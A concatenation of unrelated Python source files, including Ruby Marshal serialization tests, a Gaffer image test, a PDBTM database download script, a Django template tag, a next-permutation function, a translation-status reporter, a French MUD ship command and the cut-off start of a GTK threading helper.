        assert space.str_w(w_res) == "\x04\b[\x060"

        w_res = space.execute("return Marshal.dump([nil, true, false])")
        assert space.str_w(w_res) == "\x04\b[\b0TF"

        w_res = space.execute("return Marshal.dump([1, 2, 3])")
        assert space.str_w(w_res) == "\x04\b[\x08i\x06i\x07i\x08"

        w_res = space.execute("return Marshal.dump([1, [2, 3], 4])")
        assert space.str_w(w_res) == "\x04\b[\bi\x06[\ai\ai\bi\t"

        w_res = space.execute("return Marshal.dump([:foo, :bar])")
        assert space.str_w(w_res) == "\x04\b[\a:\bfoo:\bbar"

    def test_load_array(self, space):
        # Inverse of test_dump_array (symbols unwrap to plain strings here).
        #w_res = space.execute("return Marshal.load('\x04\b[\x00')")
        w_res = space.execute("return Marshal.load(Marshal.dump([]))")
        assert self.unwrap(space, w_res) == []

        w_res = space.execute("return Marshal.load('\x04\b[\x060')")
        assert self.unwrap(space, w_res) == [None]

        w_res = space.execute("return Marshal.load('\x04\b[\b0TF')")
        assert self.unwrap(space, w_res) == [None, True, False]

        w_res = space.execute("return Marshal.load('\x04\b[\x08i\x06i\x07i\x08')")
        assert self.unwrap(space, w_res) == [1, 2, 3]

        w_res = space.execute("return Marshal.load('\x04\b[\bi\x06[\ai\ai\bi\t')")
        assert self.unwrap(space, w_res) == [1, [2, 3], 4]

        w_res = space.execute("return Marshal.load('\x04\b[\a:\bfoo:\bbar')")
        assert self.unwrap(space, w_res) == ["foo", "bar"]

    def test_dump_symbol(self, space):
        # Symbols: ':' tag, name length, then the name bytes.
        w_res = space.execute("return Marshal.dump(:abc)")
        assert space.str_w(w_res) == "\x04\b:\babc"

        w_res = space.execute("return Marshal.dump(('hello' * 25).to_sym)")
        assert space.str_w(w_res) == "\x04\b:\x01}" + "hello" * 25

        w_res = space.execute("return Marshal.dump(('hello' * 100).to_sym)")
        assert space.str_w(w_res) == "\x04\b:\x02\xF4\x01" + "hello" * 100

    def test_load_symbol(self, space):
        # Inverse of test_dump_symbol.
        w_res = space.execute("return Marshal.load('\x04\b:\babc')")
        assert space.symbol_w(w_res) == "abc"

        w_res = space.execute("return Marshal.load('\x04\b:\x01}' + 'hello' * 25)")
        assert space.symbol_w(w_res) == "hello" * 25

    def test_dump_hash(self, space):
        # Hashes: '{' tag, pair count, then alternating key/value payloads.
        w_res = space.execute("return Marshal.dump({})")
        assert space.str_w(w_res) == "\x04\b{\x00"

        w_res = space.execute("return Marshal.dump({1 => 2, 3 => 4})")
        assert self.unwrap(space, w_res) == "\x04\b{\ai\x06i\ai\bi\t"

        w_res = space.execute("return Marshal.dump({1 => {2 => 3}, 4 => 5})")
        assert self.unwrap(space, w_res) == "\x04\b{\ai\x06{\x06i\ai\bi\ti\n"

        w_res = space.execute("return Marshal.dump({1234 => {23456 => 3456789}, 4 => 5})")
        assert self.unwrap(space, w_res) == "\x04\b{\ai\x02\xD2\x04{\x06i\x02\xA0[i\x03\x15\xBF4i\ti\n"

    def test_load_hash(self, space):
        # Inverse of test_dump_hash.
        #w_res = space.execute("return Marshal.load('\x04\b{\x00')")
        w_res = space.execute("return Marshal.load(Marshal.dump({}))")
        assert self.unwrap(space, w_res) == {}

        w_res = space.execute("return Marshal.load('\x04\b{\ai\x06i\ai\bi\t')")
        assert self.unwrap(space, w_res) == {1: 2, 3: 4}

        w_res = space.execute("return Marshal.load('\x04\b{\ai\x06{\x06i\ai\bi\ti\n')")
        assert self.unwrap(space, w_res) == {1: {2: 3}, 4: 5}

        w_res = space.execute("return Marshal.load('\x04\b{\ai\x02\xD2\x04{\x06i\x02\xA0[i\x03\x15\xBF4i\ti\n')")
        assert self.unwrap(space, w_res) == {1234: {23456: 3456789}, 4: 5}

    def test_dump_integer(self, space):
        # Positive integers outside the one-byte range: a positive length
        # byte (1-4) says how many little-endian payload bytes follow.
        w_res = space.execute("return Marshal.dump(123)")
        assert space.str_w(w_res) == "\x04\bi\x01{"

        w_res = space.execute("return Marshal.dump(255)")
        assert space.str_w(w_res) == "\x04\bi\x01\xFF"

        w_res = space.execute("return Marshal.dump(256)")
        assert space.str_w(w_res) == "\x04\bi\x02\x00\x01"

        w_res = space.execute("return Marshal.dump(2 ** 16 - 2)")
        assert space.str_w(w_res) == "\x04\bi\x02\xFE\xFF"

        w_res = space.execute("return Marshal.dump(2 ** 16 - 1)")
        assert space.str_w(w_res) == "\x04\bi\x02\xFF\xFF"

        w_res = space.execute("return Marshal.dump(2 ** 16)")
        assert space.str_w(w_res) == "\x04\bi\x03\x00\x00\x01"

        w_res = space.execute("return Marshal.dump(2 ** 16 + 1)")
        assert space.str_w(w_res) == "\x04\bi\x03\x01\x00\x01"

        w_res = space.execute("return Marshal.dump(2 ** 30 - 1)")
        assert space.str_w(w_res) == "\x04\bi\x04\xFF\xFF\xFF?"

        # TODO: test tooo big numbers (they give a warning and inf)

    def test_load_integer(self, space):
        # Inverse of test_dump_integer.
        w_res = space.execute("return Marshal.load('\x04\bi\x01{')")
        assert space.int_w(w_res) == 123

        w_res = space.execute("return Marshal.load('\x04\bi\x01\xFF')")
        assert space.int_w(w_res) == 255

        #w_res = space.execute("return Marshal.load('\x04\bi\x02\x00\x01')")
        w_res = space.execute("return Marshal.load(Marshal.dump(256))")
        assert space.int_w(w_res) == 256

        w_res = space.execute("return Marshal.load('\x04\bi\x02\xFE\xFF')")
        assert space.int_w(w_res) == 2 ** 16 - 2

        w_res = space.execute("return Marshal.load('\x04\bi\x02\xFF\xFF')")
        assert space.int_w(w_res) == 2 ** 16 - 1

        #w_res = space.execute("return Marshal.load('\x04\bi\x03\x00\x00\x01')")
        w_res = space.execute("return Marshal.load(Marshal.dump(2 ** 16))")
        assert space.int_w(w_res) == 2 ** 16

        #w_res = space.execute("return Marshal.load('\x04\bi\x03\x01\x00\x01')")
        w_res = space.execute("return Marshal.load(Marshal.dump(2 ** 16 + 1))")
        assert space.int_w(w_res) == 2 ** 16 + 1

        w_res = space.execute("return Marshal.load('\x04\bi\x04\xFF\xFF\xFF?')")
        assert space.int_w(w_res) == 2 ** 30 - 1

    def test_dump_negative_integer(self, space):
        # Negative integers outside the one-byte range use negative length
        # bytes (\xFF = 1 payload byte, \xFE = 2, ...).
        w_res = space.execute("return Marshal.dump(-1)")
        assert space.str_w(w_res) == "\x04\bi\xFA"

        w_res = space.execute("return Marshal.dump(-123)")
        assert space.str_w(w_res) == "\x04\bi\x80"

        w_res = space.execute("return Marshal.dump(-124)")
        assert space.str_w(w_res) == "\x04\bi\xFF\x84"

        w_res = space.execute("return Marshal.dump(-256)")
        assert space.str_w(w_res) == "\x04\bi\xFF\x00"

        w_res = space.execute("return Marshal.dump(-257)")
        assert space.str_w(w_res) == "\x04\bi\xFE\xFF\xFE"

        w_res = space.execute("return Marshal.dump(-(2 ** 30))")
        assert space.str_w(w_res) == "\x04\bi\xFC\x00\x00\x00\xC0"

    def test_load_negative_integer(self, space):
        # Inverse of test_dump_negative_integer.
        w_res = space.execute("return Marshal.load('\x04\bi\xFA')")
        assert space.int_w(w_res) == -1

        w_res = space.execute("return Marshal.load('\x04\bi\x80')")
        assert space.int_w(w_res) == -123

        w_res = space.execute("return Marshal.load('\x04\bi\xFF\x84')")
        assert space.int_w(w_res) == -124

        #w_res = space.execute("return Marshal.load('\x04\bi\xFF\x00')")
        w_res = space.execute("return Marshal.load(Marshal.dump(-256))")
        assert space.int_w(w_res) == -256

        w_res = space.execute("return Marshal.load('\x04\bi\xFE\xFF\xFE')")
        assert space.int_w(w_res) == -257

        #w_res = space.execute("return Marshal.load('\x04\bi\xFE\x00\x00')")
        w_res = space.execute("return Marshal.load(Marshal.dump(-(2 ** 16)))")
        assert space.int_w(w_res) == -(2 ** 16)

        w_res = space.execute("return Marshal.load('\x04\bi\xFD\xFF\xFF\xFE')")
        assert space.int_w(w_res) == -(2 ** 16 + 1)

        #w_res = space.execute("return Marshal.load('\x04\bi\xFC\x00\x00\x00')")
        w_res = space.execute("return Marshal.load(Marshal.dump(-(2 ** 24)))")
        assert space.int_w(w_res) == -(2 ** 24)

        w_res = space.execute("return Marshal.load('\x04\bi\xFC\xFF\xFF\xFF\xFE')")
        assert space.int_w(w_res) == -(2 ** 24 + 1)

        #w_res = space.execute("return Marshal.load('\x04\bi\xFC\x00\x00\x00\xC0')")
        w_res = space.execute("return Marshal.load(Marshal.dump(-(2 ** 30)))")
        assert space.int_w(w_res) == -(2 ** 30)

    def test_dump_float(self, space):
        # Floats: 'f' tag, length, then the shortest decimal text form.
        w_res = space.execute("return Marshal.dump(0.0)")
        assert space.str_w(w_res) == "\x04\bf\x060"

        w_res = space.execute("return Marshal.dump(0.1)")
        assert space.str_w(w_res) == "\x04\bf\b0.1"

        w_res = space.execute("return Marshal.dump(1.0)")
        assert space.str_w(w_res) == "\x04\bf\x061"

        w_res = space.execute("return Marshal.dump(1.1)")
        assert space.str_w(w_res) == "\x04\bf\b1.1"

        w_res = space.execute("return Marshal.dump(1.001)")
        assert space.str_w(w_res) == "\x04\bf\n1.001"

        #w_res = space.execute("return Marshal.dump(123456789.123456789)")
        #assert space.str_w(w_res) == "\x04\bf\x17123456789.12345679"

        #w_res = space.execute("return Marshal.dump(-123456789.123456789)")
        #assert space.str_w(w_res) == "\x04\bf\x18-123456789.12345679"

        #w_res = space.execute("return Marshal.dump(-0.0)")
        #assert space.str_w(w_res) == "\x04\bf\a-0"

    def test_load_float(self, space):
        # Inverse of test_dump_float.
        w_res = space.execute("return Marshal.load('\x04\bf\x060')")
        assert space.float_w(w_res) == 0.0

        w_res = space.execute("return Marshal.load('\x04\bf\b0.1')")
        assert space.float_w(w_res) == 0.1

        w_res = space.execute("return Marshal.load('\x04\bf\x061')")
        assert space.float_w(w_res) == 1.0

        w_res = space.execute("return Marshal.load('\x04\bf\b1.1')")
        assert space.float_w(w_res) == 1.1

        w_res = space.execute("return Marshal.load('\x04\bf\n1.001')")
        assert space.float_w(w_res) == 1.001

        #w_res = space.execute("return Marshal.load('\x04\bf\x17123456789.12345679')")
        #assert space.float_w(w_res) == 123456789.123456789

        #w_res = space.execute("return Marshal.load('\x04\bf\x18-123456789.12345679')")
        #assert space.float_w(w_res) == -123456789.123456789

        #w_res = space.execute("return Marshal.load('\x04\bf\a-0')")
        #assert repr(space.float_w(w_res)) == repr(-0.0)

    def test_dump_string(self, space):
        # Strings: 'I' (instance-vars) wrapping '"' data plus the
        # :E => true encoding flag (UTF-8).
        w_res = space.execute("return Marshal.dump('')")
        assert space.str_w(w_res) == "\x04\bI\"\x00\x06:\x06ET"

        w_res = space.execute("return Marshal.dump('abc')")
        assert space.str_w(w_res) == "\x04\bI\"\babc\x06:\x06ET"

        w_res = space.execute("return Marshal.dump('i am a longer string')")
        assert space.str_w(w_res) == "\x04\bI\"\x19i am a longer string\x06:\x06ET"

    def test_load_string(self, space):
        # Inverse of test_dump_string.
        #w_res = space.execute("return Marshal.load('\x04\bI\"\x00\x06:\x06ET')")
        w_res = space.execute("return Marshal.load(Marshal.dump(''))")
        assert space.str_w(w_res) == ""

        w_res = space.execute("return Marshal.load('\x04\bI\"\babc\x06:\x06ET')")
        assert space.str_w(w_res) == "abc"

        w_res = space.execute("return Marshal.load('\x04\bI\"\x19i am a longer string\x06:\x06ET')")
        assert space.str_w(w_res) == "i am a longer string"

    def test_array(self, space):
        # Round-trip arrays of mixed sizes/types through dump+load.
        w_res = space.execute("return Marshal.load(Marshal.dump([1, 2, 3]))")
        assert self.unwrap(space, w_res) == [1, 2, 3]

        w_res = space.execute("return Marshal.load(Marshal.dump([1, [2, 3], 4]))")
        assert self.unwrap(space, w_res) == [1, [2, 3], 4]

        w_res = space.execute("return Marshal.load(Marshal.dump([130, [2, 3], 4]))")
        assert self.unwrap(space, w_res) == [130, [2, 3], 4]

        w_res = space.execute("return Marshal.load(Marshal.dump([-10000, [2, 123456], -9000]))")
        assert self.unwrap(space, w_res) == [-10000, [2, 123456], -9000]

        w_res = space.execute("return Marshal.load(Marshal.dump([:foo, :bar]))")
        assert self.unwrap(space, w_res) == ["foo", "bar"]

        w_res = space.execute("return Marshal.load(Marshal.dump(['foo', 'bar']))")
        assert self.unwrap(space, w_res) == ["foo", "bar"]

    def test_incompatible_format(self, space):
        # A wrong version header must raise TypeError with the version
        # numbers decoded from the first two bytes ('a'=97, 's'=115).
        with self.raises(
            space,
            "TypeError",
            "incompatible marshal file format (can't be read)\n"
            "format version 4.8 required; 97.115 given"
        ):
            space.execute("Marshal.load('asd')")

    def test_short_data(self, space):
        # Fewer than the two header bytes is "too short".
        with self.raises(space, "ArgumentError", "marshal data too short"):
            space.execute("Marshal.load('')")

    def test_parameters(self, space):
        # Non-string, non-IO argument to load is rejected.
        with self.raises(space, "TypeError", "instance of IO needed"):
            space.execute("Marshal.load(4)")

    def test_io(self, space, tmpdir):
        # dump can write to an IO object; load accepts either the read
        # bytes or the IO object itself.
        f = tmpdir.join("testfile")

        w_res = space.execute("""
        Marshal.dump('hallo', File.new('%s', 'wb'))
        file = File.open('%s', 'rb')
        return Marshal.load(file.read)
        """ % (f, f))
        assert space.str_w(w_res) == "hallo"

        w_res = space.execute("""
        Marshal.dump('hallo', File.new('%s', 'wb'))
        file = File.open('%s', 'rb')
        return Marshal.load(file)
        """ % (f, f))
        assert space.str_w(w_res) == "hallo"

##########################################################################
#
#  Copyright (c) 2013-2015, Image Engine Design Inc. All rights reserved.
#
#  Redistribution and use in source and binary forms, with or without
#  modification, are permitted provided that the following conditions are
#  met:
#
#      * Redistributions of source code must retain the above
#        copyright notice, this list of conditions and the following
#        disclaimer.
#
#      * Redistributions in binary form must reproduce the above
#        copyright notice, this list of conditions and the following
#        disclaimer in the documentation and/or other materials provided with
#        the distribution.
#
#      * Neither the name of John Haddon nor the names of
#        any other contributors to this software may be used to endorse or
#        promote products derived from this software without specific prior
#        written permission.
#
#  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
#  IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
#  THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
#  PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
#  CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
#  EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
#  PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
#  PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
#  LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
#  NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
#  SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################

import os
import unittest

import IECore

import Gaffer
import GafferImage
import GafferImageTest

class ObjectToImageTest( GafferImageTest.ImageTestCase ) :

	fileName = os.path.expandvars( "$GAFFER_ROOT/python/GafferImageTest/images/checker.exr" )
	negFileName = os.path.expandvars( "$GAFFER_ROOT/python/GafferImageTest/images/checkerWithNegativeDataWindow.200x150.exr" )

	def test( self ) :

		# Round-trip : an image object fed into ObjectToImage must come
		# out of the "out" plug unchanged.
		source = IECore.Reader.create( self.fileName ).read()

		node = GafferImage.ObjectToImage()
		node["object"].setValue( source )

		self.assertEqual( node["out"].image(), source )

	def testImageWithANegativeDataWindow( self ) :

		# Same round-trip, using an image whose data window has a
		# negative origin.
		source = IECore.Reader.create( self.negFileName ).read()

		node = GafferImage.ObjectToImage()
		node["object"].setValue( source )

		self.assertEqual( node["out"].image(), source )

	def testHashVariesPerTileAndChannel( self ) :

		node = GafferImage.ObjectToImage()
		node["object"].setValue( IECore.Reader.create( self.fileName ).read() )

		# Different channels of the same tile must hash differently.
		self.assertNotEqual(
			node["out"].channelDataHash( "R", IECore.V2i( 0 ) ),
			node["out"].channelDataHash( "G", IECore.V2i( 0 ) )
		)

		# The same channel on different tiles must hash differently.
		self.assertNotEqual(
			node["out"].channelDataHash( "R", IECore.V2i( 0 ) ),
			node["out"].channelDataHash( "R", IECore.V2i( GafferImage.ImagePlug.tileSize() ) )
		)

# Allow running this test module directly as a script.
if __name__ == "__main__":
	unittest.main()

#!/usr/bin/env python2
from __future__ import print_function

import sys
import os
import urllib
import argparse
import xml.etree.ElementTree as ET

def warn(*msgs):
	"""Print each message to stderr, prefixed with '[WARNING]:'."""
	for msg in msgs:
		print('[WARNING]:', msg, file=sys.stderr)

class PDBTM:
	"""Parses a PDBTM XML file and exposes its root element as ``self.root``."""

	def __init__(self, filename):
		"""Read *filename*, strip trailing whitespace per line, and parse.

		Stores the parsed ElementTree root on ``self.root`` and prints it
		(kept from the original code, which used the parse result only for
		this debug print).
		"""
		# Use a context manager so the file handle is always closed
		# (the original left it open).
		with open(filename) as f:
			# Join lines with trailing whitespace removed; equivalent to the
			# original strsum() helper followed by .strip().
			s = '\n'.join(line.rstrip() for line in f).strip()

		self.root = ET.fromstring(s)
		# BUG FIX: was `print(root)` -- `root` is undefined here (NameError);
		# the attribute just assigned is `self.root`.
		print(self.root)

def get_database(prefix='.'):
	"""Download the full PDBTM database dump into <prefix>/pdbtmall."""
	if not prefix.endswith('/'):
		prefix += '/'
	print('Fetching database...', file=sys.stderr)
	# NOTE: urllib.urlopen is the Python 2 API (file is marked python2).
	remote = urllib.urlopen('http://pdbtm.enzim.hu/data/pdbtmall')
	print('Saving database...', file=sys.stderr)
	out = open('%s/pdbtmall' % prefix, 'w')
	for line in remote:
		out.write(line)
	remote.close()
	out.close()

def build_database(fn, prefix):
	"""Split a concatenated pdbtmall dump into one XML file per PDB id.

	The first line of the dump is treated as a shared header and is
	prepended to every extracted entry; each entry starts at a line
	beginning with '<pdbtm' whose 4-character PDB id follows 'ID="'.
	"""
	print('Unpacking database...', file=sys.stderr)
	with open(fn) as handle:
		raw = handle.read()

	lines = raw.split('\n')
	header = lines[0] if lines else ''
	entries = []
	pdbids = []
	for line in lines[1:]:
		# Wrapper / declaration lines are not part of any entry.
		if 'PDBTM>' in line:
			continue
		if line.startswith('<?'):
			continue
		if line.startswith('<pdbtm'):
			# 'ID="' ends 4 chars after the start of 'ID='; the PDB id
			# itself is the next 4 characters.
			start = line.find('ID=') + 4
			pdbids.append(line[start:start + 4])
			entries.append(header)
		entries[-1] += '\n' + line

	if not prefix.endswith('/'):
		prefix += '/'
	if not os.path.isdir(prefix):
		os.mkdir(prefix)
	for pdbid, entry in zip(pdbids, entries):
		out = open(prefix + pdbid + '.xml', 'w')
		out.write(entry)
		out.close()
		

if __name__ == '__main__':
	# Command-line entry point: fetch and/or unpack the PDBTM database.
	parser = argparse.ArgumentParser(description='Manages PDBTM databases. Automatically fetches the PDBTM database if no options are specified. Run without any arguments, dbtool will retrieve the PDBTM database, store it in pdbtm, and unpack it.')

	parser.add_argument('-d', '--db', default='pdbtmall', help='name of concatenated database file {default:pdbtmall}')
	parser.add_argument('-b', '--build-db', action='store_true', help='(re)build database from an existing pdbtmsall file (available at http://pdbtm.enzim.hu/data/pdbtmall)')
	parser.add_argument('directory', nargs='?', default='pdbtm', help='directory to store database in')
	parser.add_argument('-f', '--force-refresh', action='store_true', help='force overwrite of existing database. Functionally equivalent to removing the old database and rerunning.')
	#parser.add_argument('-n', metavar='bundle_size', type=int, help='size to cut bundles into')

	args = parser.parse_args()

	# -b: only unpack an already-downloaded dump, skipping the fetch.
	if args.build_db: build_database(args.db, args.directory)
	else: #db = PDBTM(args.db)
		# Default path: download the dump (unless it is cached and
		# --force-refresh was not given), then unpack it.
		if not os.path.isdir(args.directory): os.mkdir(args.directory)
		if args.force_refresh or not os.path.isfile('%s/%s' % (args.directory, args.db)): get_database(args.directory)
		build_database('%s/%s' % (args.directory, args.db), args.directory)
		

	#http://pdbtm.enzim.hu/data/pdbtmall

from django.template import Library, Node, resolve_variable, TemplateSyntaxError
from django.core.urlresolvers import reverse

# Registry used to expose this module's template tags to Django.
register = Library()
   
@register.simple_tag
def active(request, pattern):
    """Return 'active' when *pattern* matches the current request path, else ''."""
    import re

    return 'active' if re.search(pattern, request.get_full_path()) else ''
'''
Given a number, find the next higher number that uses only the digits of the
given number. For example, if the given number is 1234, the next higher number
with the same digits is 1243.
'''

def FindNext(num):
    """Return the next higher number using the same digits, or `num` itself
    if no such rearrangement exists (digits already in descending order).

    Standard next-permutation approach: scan from the right for the first
    digit smaller than its right neighbour (the pivot), swap it with the
    smallest suffix digit strictly greater than it, and sort the rest.
    """
    digits = str(num)
    length = len(digits)
    for i in range(length - 2, -1, -1):
        pivot = digits[i]
        if pivot < digits[i + 1]:
            suffix = sorted(digits[i:])
            # BUG FIX: the original used temp[temp.index(current)+1], which
            # picks a *duplicate* of the pivot when the suffix contains one
            # (e.g. FindNext(1151) returned 1115 instead of 1511). We need
            # the smallest digit strictly greater than the pivot.
            successor = next(d for d in suffix if d > pivot)
            suffix.remove(successor)
            return int(digits[:i] + successor + ''.join(suffix))
    return num

import requests


class Status(object):
    """Summarises translation-status snapshots fetched from a JSON endpoint.

    NOTE(review): this class is written for Python 2 -- ``summary`` indexes
    ``dict.items()`` and calls ``.sort()`` on ``dict.keys()``, both of which
    return lists only on Python 2. Confirm the target interpreter before
    porting.

    The endpoint is assumed to return a list of day-snapshots ordered
    oldest-to-newest, each with 'created' and 'locales' keys -- TODO confirm
    against the producing service.
    """

    # Locales excluded from all reports (en_US is presumably the source
    # locale -- verify).
    SKIP_LOCALES = ['en_US']

    def __init__(self, url, app=None, highlight=None):
        # url: JSON endpoint; app: optional app name to narrow results to;
        # highlight: locales to report in a separate "highlighted" section.
        self.url = url
        self.app = app
        self.highlight = highlight or []

        # Lazily populated by get_data().
        self.data = []
        self.created = None

    def get_data(self):
        # Fetch and cache the JSON payload; no-op if already fetched.
        if self.data:
            return

        resp = requests.get(self.url)
        if resp.status_code != 200:
            resp.raise_for_status()

        self.data = resp.json()
        # Timestamp of the newest snapshot.
        self.created = self.data[-1]['created']

    def summary(self):
        """Generates summary data of today's state"""
        self.get_data()

        highlight = self.highlight
        # Newest snapshot only.
        last_item = self.data[-1]

        output = {}
        output['app'] = self.app or 'ALL'

        data = last_item['locales']

        # Narrow each locale record to the requested app, or use it whole.
        if self.app:
            get_item = lambda x: x['apps'][self.app]
        else:
            get_item = lambda x: x

        # Python-2-only: .items()/.keys() treated as lists here.
        apps = data.items()[0][1]['apps'].keys()
        apps.sort()
        output['apps'] = apps

        # Split locales into highlighted and regular groups.
        items = [item for item in data.items() if item[0] not in highlight]
        hitems = [item for item in data.items() if item[0] in highlight]

        highlighted = []
        if hitems:
            # Sort descending by completion percentage.
            for loc, loc_data in sorted(hitems, key=lambda x: -x[1]['percent']):
                if loc in self.SKIP_LOCALES:
                    continue
                item = get_item(loc_data)
                # -1 marks a missing statistic.
                total = item.get('total', -1)
                translated = item.get('translated', -1)
                percent = item.get('percent', -1)
                untranslated_words = item.get('untranslated_words', -1)

                highlighted.append({
                    'locale': loc,
                    'percent': percent,
                    'total': total,
                    'translated': translated,
                    'untranslated': total - translated,
                    'untranslated_words': untranslated_words
                })
        output['highlighted'] = highlighted

        locales = []
        # Same per-locale extraction for the non-highlighted group.
        for loc, loc_data in sorted(items, key=lambda x: -x[1]['percent']):
            if loc in self.SKIP_LOCALES:
                continue
            item = get_item(loc_data)
            total = item.get('total', -1)
            translated = item.get('translated', -1)
            percent = item.get('percent', -1)
            untranslated_words = item.get('untranslated_words', -1)

            locales.append({
                'locale': loc,
                'percent': percent,
                'total': total,
                'translated': translated,
                'untranslated': total - translated,
                'untranslated_words': untranslated_words
            })

        output['locales'] = locales

        output['created'] = self.created

        return output

    def _mark_movement(self, data):
        """For each item, converts to a tuple of (movement, item)"""
        ret = []
        prev_day = None
        for i, day in enumerate(data):
            # First day has no predecessor, so no movement marker.
            if i == 0:
                ret.append(('', day))
                prev_day = day
                continue

            if prev_day > day:
                item = ('down', day)
            elif prev_day < day:
                item = ('up', day)
            else:
                item = ('equal', day)

            prev_day = day
            ret.append(item)

        return ret

    def history(self):
        # Per-locale day-over-day movement for the last num_days snapshots.
        self.get_data()

        data = self.data
        highlight = self.highlight
        app = self.app

        # Get a list of the locales we'll iterate through
        locales = sorted(data[-1]['locales'].keys())

        num_days = 14

        # Truncate the data to what we want to look at
        data = data[-num_days:]

        if app:
            get_data = lambda x: x['apps'][app]['percent']
        else:
            get_data = lambda x: x['percent']

        hlocales = [loc for loc in locales if loc in highlight]
        locales = [loc for loc in locales if loc not in highlight]

        output = {}
        output['app'] = self.app or 'All'

        output['headers'] = [item['created'] for item in data]

        output['highlighted'] = sorted(
            (loc, self._mark_movement(get_data(day['locales'][loc]) for day in data))
            for loc in hlocales
        )

        # Locales absent on a given day default to 0.0 percent.
        output['locales'] = sorted(
            (loc, self._mark_movement(get_data(day['locales'].get(loc, {'percent': 0.0})) for day in data))
            for loc in locales
        )

        output['created'] = self.created

        return output

# -*-coding:Utf-8 -*

# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
#   list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
#   this list of conditions and the following disclaimer in the documentation
#   and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
#   may be used to endorse or promote products derived from this software
#   without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.


"""Package contenant la commande 'débarquer'."""

from math import sqrt

from primaires.interpreteur.commande.commande import Commande
from secondaires.navigation.constantes import *

class CmdDebarquer(Commande):

    """The 'debarquer' (debark) command."""

    def __init__(self):
        """Set up the command name, category and help texts."""
        Commande.__init__(self, "debarquer", "debark")
        self.nom_categorie = "navire"
        self.aide_courte = "débarque du navire"
        self.aide_longue = (
            "Cette commande permet de débarquer du navire sur lequel "
            "on se trouve. On doit se trouver assez prêt d'une côte "
            "pour débarquer dessus.")

    def interpreter(self, personnage, dic_masques):
        """Run the command: jump from the ship onto the nearest shore."""
        salle = personnage.salle
        navire = getattr(salle, "navire", None)
        if navire is None:
            personnage << "|err|Vous n'êtes pas sur un navire.|ff|"
            return
        if navire.etendue is None:
            personnage << "|err|Vous n'êtes pas sur un navire.|ff|"
            return

        personnage.agir("bouger")

        # Search the water body for the closest dockable shore room:
        # same altitude, dockable terrain, strictly less than 2 units away.
        etendue = navire.etendue
        destination = None
        meilleure = 2
        x, y, z = salle.coords.tuple()
        for cote in etendue.cotes.values():
            if cote.coords.z != z:
                continue
            c_x, c_y, c_z = cote.coords.tuple()
            dist = sqrt((x - c_x) ** 2 + (y - c_y) ** 2)
            if dist < meilleure and cote.nom_terrain in TERRAINS_ACCOSTABLES:
                destination = cote
                meilleure = dist

        if destination is None:
            personnage << "|err|Aucun quai n'a pu être trouvé à " \
                    "proximité.|ff|"
            return

        # Move the character and narrate the jump on both sides.
        personnage.salle = destination
        personnage << "Vous sautez sur {}.".format(destination.titre.lower())
        personnage << destination.regarder(personnage)
        destination.envoyer("{{}} arrive en sautant depuis {}.".format(
                navire.nom), personnage)
        salle.envoyer("{{}} saute sur {}.".format(
                destination.titre.lower()), personnage)
        importeur.hook["personnage:deplacer"].executer(
                personnage, destination, None, 0)
        # Remind the player to moor the ship if they landed off-ship.
        if getattr(destination, "navire", None) is None:
            personnage.envoyer_tip("N'oubliez pas d'amarrer votre navire "
                    "avec %amarre% %amarre:attacher%.")

#
# GtkMain.py -- pygtk threading help routines.
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke.  All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
"""
GUI threading help routines.

Usage:

   import GtkMain

   # See constructor for GtkMain for options
   self.mygtk = GtkMain.GtkMain()

   # NOT THIS
   #gtk.main()
   # INSTEAD, main thread calls this:
   self.mygtk.mainloop()
   
   # (asynchronous call)
   self.mygtk.gui_do(method, arg1, arg2, ... argN, kwd1=val1, ..., kwdN=valN)

   # OR 
   # (synchronous call)
   res = self.mygtk.gui_call(method, arg1, arg2, ... argN, kwd1=val1, ..., kwdN=valN)

   # To cause the GUI thread to terminate the mainloop
   self.mygtk.gui_quit()
   
   """
import sys, traceback
import thread, threading
import logging
import Queue as que

import gtk
from ginga.misc import Task, Future


class GtkMain(object):

    def __init__(self, queue=None, logger=None, ev_quit=None):
        # You can pass in a queue if you prefer to do so
        if not queue:
            queue = que.Queue()
        self.gui_queue = queue
